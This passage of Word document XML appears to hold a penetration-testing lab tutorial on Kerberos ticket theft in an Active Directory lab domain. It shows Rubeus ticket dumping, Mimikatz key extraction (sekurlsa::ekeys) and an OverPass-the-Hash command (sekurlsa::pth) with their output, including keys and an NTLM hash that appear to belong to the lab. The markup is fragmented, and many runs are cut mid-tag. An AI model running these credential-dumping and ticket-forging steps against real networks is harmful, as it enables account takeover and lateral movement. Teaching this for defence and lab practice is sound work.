          <w:t>0;3e7]-0-2-40a50000-DC01$@cifs-DC01.inlanefreight.htb.kirbi</w:t>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r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="2A443E88" wp14:textId="66CF78D9">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>The tickets that end with $ correspond to the computer account, which needs a ticket to interact with the Active Directory. User tickets have the user's name, followed by an @ that separates the service name and the domain, for example: [</w:t>
      </w:r>
      <w:hyperlink r:id="Rc6737cbaaa1b4ffa">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>randomvalue]-username@service-domain.local.kirbi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="6D5C2355" wp14:textId="476345AB">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If you pick a ticket with the service krbtgt, it corresponds to the TGT of that account.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="01AB1F08" wp14:textId="054C7B58">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>We can also export tickets using Rubeus and the option dump. This option can be used to dump all tickets (if running as a local administrator). Rubeus dump, instead of giving us a file, will print the ticket encoded in base64 format. We are adding the option /nowrap for easier copy-paste.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="3F5A3123" wp14:textId="036041CC">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At the time of writing, using Mimikatz version 2.2.0 20220919, if we run "sekurlsa::ekeys" it presents all hashes as des_cbc_md4 on some Windows 10 versions. Exported tickets (sekurlsa::tickets /export) do not work correctly due to the wrong encryption. It is possible to use these hashes to generate new tickets or use Rubeus to export tickets in base64 format.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="079EB591" wp14:textId="1D565852">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Rubeus - Export Tickets</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="36023302" wp14:textId="4503D2AA">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7822A8EC" wp14:textId="1FF8432A">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dump /nowrap</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v1.5.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Action: Dump Kerberos Ticket Data (All Users)</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Current LUID    : 0x6c680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ServiceName           :  krbtgt/inlanefreight.htb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DC01$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StartTime             :  7/12/2022 9:39:54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EndTime               :  7/12/2022 7:39:54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RenewTill             :  7/19/2022 9:39:54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  name_canonicalize, pre_authent, renewable, forwarded, forwardable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KeyType               :  aes256_cts_hmac_sha1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Base64(key)           :  KWBMpM4BjenjTniwH0xw8FhvbFSf+SBVZJJcWgUKi3w=</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Base64EncodedTicket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</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Domain                   : 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LogonId                  : 0x6c680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UserSID                  : S-1-5-21-228825152-3134732153-3833540767-1107</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AuthenticationPackage    : Kerberos</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LogonType                : Interactive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LogonTime                : 7/12/2022 9:42:15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LogonServer              : DC01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LogonServerDNSDomain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UserPrincipalName        : </w:t>
      </w:r>
      <w:hyperlink r:id="R4212f8b3a4e647fe">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>plaintext@inlanefreight.htb</w:t>
        </w:r>
        <w:r>
          <w:br/>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ServiceName           :  krbtgt/inlanefreight.htb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StartTime             :  7/12/2022 9:42:15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EndTime               :  7/12/2022 7:42:15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RenewTill             :  7/19/2022 9:42:15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  name_canonicalize, pre_authent, initial, renewable, forwardable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KeyType               :  aes256_cts_hmac_sha1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Base64(key)           :  2NN3wdC4FfpQunUUgK+MZO8f20xtXF0dbmIagWP0Uu0=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Base64EncodedTicket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</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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="21DE6828" wp14:textId="786716D3">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To collect all tickets we need to execute Mimikatz or Rubeus as an administrator.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="530E5DE0" wp14:textId="0F34D897">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>This is a common way to retrieve tickets from a computer. Another advantage of abusing Kerberos tickets is the ability to forge our own tickets. Let's see how we can do this using the OverPass the Hash or Pass the Key technique.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="45C28909" wp14:textId="7FFB1DE6"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="177E66E7" wp14:textId="2F82878F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Pass the Key or OverPass the Hash</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="6629169A" wp14:textId="2E473ADA">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">The traditional Pass the Hash (PtH) technique involves reusing an NTLM password hash that doesn't touch Kerberos. The Pass the Key or OverPass the Hash approach converts a hash/key (rc4_hmac, aes256_cts_hmac_sha1, etc.) for a domain-joined user into a full Ticket-Granting-Ticket (TGT). This technique was developed by Benjamin Delpy and Skip Duckwall in their presentation </w:t>
      </w:r>
      <w:hyperlink r:id="Rebbeb630c0cd476b">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>Abusing Microsoft Kerberos - Sorry you guys don't get it</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">. Also </w:t>
      </w:r>
      <w:hyperlink r:id="R5343f9f264f543d2">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>Will Schroeder</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> adapted their project to create the </w:t>
      </w:r>
      <w:hyperlink r:id="R20633cbbdcf5442c">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>Rubeus</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="2CAEFB91" wp14:textId="62D6DBCF">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>To forge our tickets, we need to have the user's hash; we can use Mimikatz to dump all users Kerberos encryption keys using the module sekurlsa::ekeys. This module will enumerate all key types present for the Kerberos package.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="1CBF3DC9" wp14:textId="4F4329B3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Mimikatz - Extract Kerberos Keys</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="17955EC9" wp14:textId="74DDC47F">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5F24A5A7" wp14:textId="3EB2170E">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mimikatz.exe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mimikatz 2.2.0 (x64) #19041 Aug  6 2020 14:53:43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"A La Vie, A L'Amour" - (oe.eo)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 Benjamin DELPY `gentilkiwi` ( </w:t>
      </w:r>
      <w:hyperlink r:id="Rb9111c321e25471e">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>benjamin@gentilkiwi.com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&gt; </w:t>
      </w:r>
      <w:hyperlink r:id="Ra0e2cb23a1764942">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://blog.gentilkiwi.com/mimikatz</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v ##'       Vincent LE TOUX             ( </w:t>
      </w:r>
      <w:hyperlink r:id="Ra8e730a58ef14f5c">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>vincent.letoux@gmail.com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&gt; </w:t>
      </w:r>
      <w:hyperlink r:id="Ra3fcaf38cfa14390">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://pingcastle.com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w:t>
      </w:r>
      <w:hyperlink r:id="R1c1bf8964e404484">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://mysmartlogon.com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privilege::debug</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Privilege '20'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sekurlsa::ekeys</w:t>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Authentication Id : 0 ; 444066 (00000000:0006c6a2)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Session           : Interactive from 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>User 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Domain            : HTB</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Logon Server      : DC01</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Logon Time        : 7/12/2022 9:42:15 AM</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>SID               : S-1-5-21-228825152-3134732153-3833540767-1107</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Username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Domain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Password : (null)</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Key List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aes256_hmac       b21c99fc068e3ab2ca789bccbef67de43791fd911c6e15ead25641a8fda3fe60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rc4_hmac_nt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rc4_hmac_old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rc4_md4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rc4_hmac_nt_exp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rc4_hmac_old_exp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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="0E7EAB59" wp14:textId="05E408B7">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Now that we have access to the AES256_HMAC and RC4_HMAC keys, we can perform the OverPass the Hash or Pass the Key attack using Mimikatz and Rubeus.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="19DAD007" wp14:textId="53F740C1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Mimikatz - Pass the Key or OverPass the Hash</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="3A19D53F" wp14:textId="3C00A853">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07890D1E" wp14:textId="29AFF0AA">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mimikatz.exe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mimikatz 2.2.0 (x64) #19041 Aug  6 2020 14:53:43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"A La Vie, A L'Amour" - (oe.eo)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 Benjamin DELPY `gentilkiwi` ( </w:t>
      </w:r>
      <w:hyperlink r:id="R1ed94293f6a946e7">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>benjamin@gentilkiwi.com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&gt; </w:t>
      </w:r>
      <w:hyperlink r:id="R16000cc1ba9d4570">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://blog.gentilkiwi.com/mimikatz</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v ##'       Vincent LE TOUX             ( </w:t>
      </w:r>
      <w:hyperlink r:id="R017a100bc458483b">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>vincent.letoux@gmail.com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&gt; </w:t>
      </w:r>
      <w:hyperlink r:id="R47c6622a78664d7a">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://pingcastle.com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w:t>
      </w:r>
      <w:hyperlink r:id="R5c321e6e29f743d7">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://mysmartlogon.com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privilege::debug</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Privilege '20'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sekurlsa::pth /domain:inlanefreight.htb /user:plaintext /ntlm:3f74aa8f08f712f09cd5177b5c1ce50f</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user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domain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program : cmd.exe</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>impers. : no</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>NTLM    :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PID  1128</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TID  3268</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LSA Process is now R/W</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LUID 0 ; 3414364 (00000000:0034195c)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msv1_0   - data copy @ 000001C7DBC0B630 : OK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kerberos - data copy @ 000001C7E20EE578</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aes256_hmac       -&gt; null</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aes128_hmac       -&gt; null</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rc4_hmac_nt       OK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rc4_hmac_old      OK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rc4_md4           OK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rc4_hmac_nt_exp   OK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rc4_hmac_old_exp  OK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*Password replace @ 000001C7E2136BC8 (32) -&gt; null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="36680620" wp14:textId="6694B62F">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>This will create a new cmd.exe window that we can use to request access to any service we want in the context of the target user.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="20D43D49" wp14:textId="17B5BAF0">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>To forge a ticket using Rubeus, we can use the module asktgt with the username, domain, and hash which can be /rc4, /aes128, /aes256, or /des. In the following example, we use the aes256 hash from the information we collect using Mimikatz sekurlsa::ekeys.</w:t>
      </w:r>
    </w:p>
